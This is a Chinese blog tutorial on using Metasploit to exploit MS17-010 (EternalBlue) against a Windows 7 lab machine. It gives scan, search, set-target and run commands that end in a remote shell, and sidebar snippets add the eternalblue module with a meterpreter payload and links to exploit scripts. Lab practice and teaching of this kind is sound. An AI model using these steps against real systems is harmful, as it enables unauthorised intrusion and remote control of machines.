渗透测试/metasploit控制目标电脑/ms17-010

最新推荐文章于 2023-06-24 20:42:42 发布
最新推荐文章于 2023-06-24 20:42:42 发布
阅读量335 收藏 2
点赞数
分类专栏: 渗透测试/metasploit框架 文章标签: 安全 linux 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dkpower111/article/details/113462268
版权

MSF

msf是一款开源安全漏洞利用和测试工具,集成了各种平台常见的溢出漏洞和流行的shellcode,并保持持续更新

模块

auxiliary: 辅助模块,辅助渗透
exploits: 漏洞利用模块,包含主流漏洞利用脚本
payloads: 攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码
post: 后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令
encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统。
evasion: 躲避模块,用来生成免杀payload。

msf启动

打开Kali 输入msfconsole
!!!在2020年msf版本为msf5,而在21年,我1月31号打开,进行了更新,成为了msf6

msf控制目标电脑过程(永恒之蓝漏洞)

为了安全、不犯法,我使用了win7的靶机,为什么使用win7作为靶机呢,这就和永恒之蓝漏洞有关了,它存在于win7之中,(具体可以百度),我一开始使用了winxp作为靶机,但是攻击失败。msf17_010针对文件共享。

下面介绍攻击过程
(1)在攻击前我查到靶机的IP地址(这是必须的工作)
(2)我使用了如下指令db_nmap -sT -T4+IP 进行扫描,扫描结果如下

在这幅图中,可以看到靶机开放的端口,而永恒之蓝漏洞基本上都是通过135、137、138、139、445等端口入侵。在我的攻击过程中,我选择使用445端口
(3)输入了hosts ,取出所有的主机地址 (在实验中可以使用help语句查询帮助)
在这里插入图片描述
(4)输入services 取出所有服务,可以显示扫描出机器开放的端口
在这里插入图片描述
(5)辅助模块的使用 use+模块
eg:use auxiliary/scanner/portscan/ack ack:第二次握手包扫描
(6)扫描,搜索ms17_010
search ms17_010
在这里插入图片描述
(7)use 0-4即可使用

(8)查看设置 showoptions
在这里插入图片描述
(9) 设置攻击目标
在这里插入图片描述
(10)设置攻击端口(以默认设置)
在攻击中使用set即可

(11)开始攻击
run
在这里插入图片描述
(12)最终结果
在这里插入图片描述
这个就相当于靶机中的cmd,可以输入指令,达到控制靶机的效果.

dkpower111
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Metasploit控制目标电脑
qq_51461656的博客
02-05 366
文章目录一、Metasploit简介二、Metaspolit使用 一、Metasploit简介 1、简介 MSF The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的渗透测试工具。 进一步解释 msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出 漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 shellcode:是
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2569
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
通过Metasploit利用MS17_010渗透新姿势
weixin_44255593的博客
01-23 419
实验环境: 靶机 Windows7IP地址 192.168.1.109 攻击机:Kali Linux 2019 IP地址 192.168.1.110 实验步骤: apt-get install wine 更新wine wine cmd.exe 测试递归,然后输入exit推出即可 nmap -O -sV 192.168.1.109扫描端口 service postgresql start 启动postgresql msfconsole search ms17_010 搜索ms17...
利用msf控制目标电脑
m0_52923241的博客
04-08 706
利用永恒之蓝漏洞攻击win7准备工作永恒之蓝漏洞msf简介攻击步骤 准备工作 kali Linux虚拟机一台 win7虚拟机一台(注意关闭防火墙) 永恒之蓝漏洞 简介:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内
kali 2020 中用Metasploit利用MS17_010漏洞控制对方主机
qq_41179687的博客
11-18 1033
kali 2020 中用Metasploit利用MS17_010漏洞控制对方主机 准备: 1、初始化数据库 2、启动msf 3、 4、 5、 6、 7、 8、 9、 10、 11、 12、 13、 ...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
Metasploit渗透测试指南完整版-pdf
07-23
软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑
tempulcc的博客
09-15 361
metaspolit配合shellter渗透windows
使用MSFPC远程控制
y3174445239的博客
06-24 548
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 928
● Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
使用msfvenom实现远程控制.
最新发布
2301_78457119的博客
06-24 685
在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
6.4-5 msf被控端与主控端
weixin_70294597的博客
06-08 156
远程控制是一个常见计算机术语,指的就是可以在一台设备上操纵另一台设备的软件。通常情况下,远程控制分为两个部分,即被控端与主控端,一台计算机被植入被控端,他就会被另一台装有主控端的计算机所控制。
利用Metasploit控制目标电脑(Win7_x64系统)
天涯的浪子
07-28 781
MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试MS17-010(永恒之蓝)漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shado...
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4278
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
漏洞复现永恒之蓝MS-17010+修复
BROTHERYY的博客
08-20 1643
攻击机:192.168.20.101 靶机:192.168.20.103 使用msf的扫描模块,扫描靶机是否存在漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.20.103 run 使用攻击载荷进行攻击 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.20.10
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值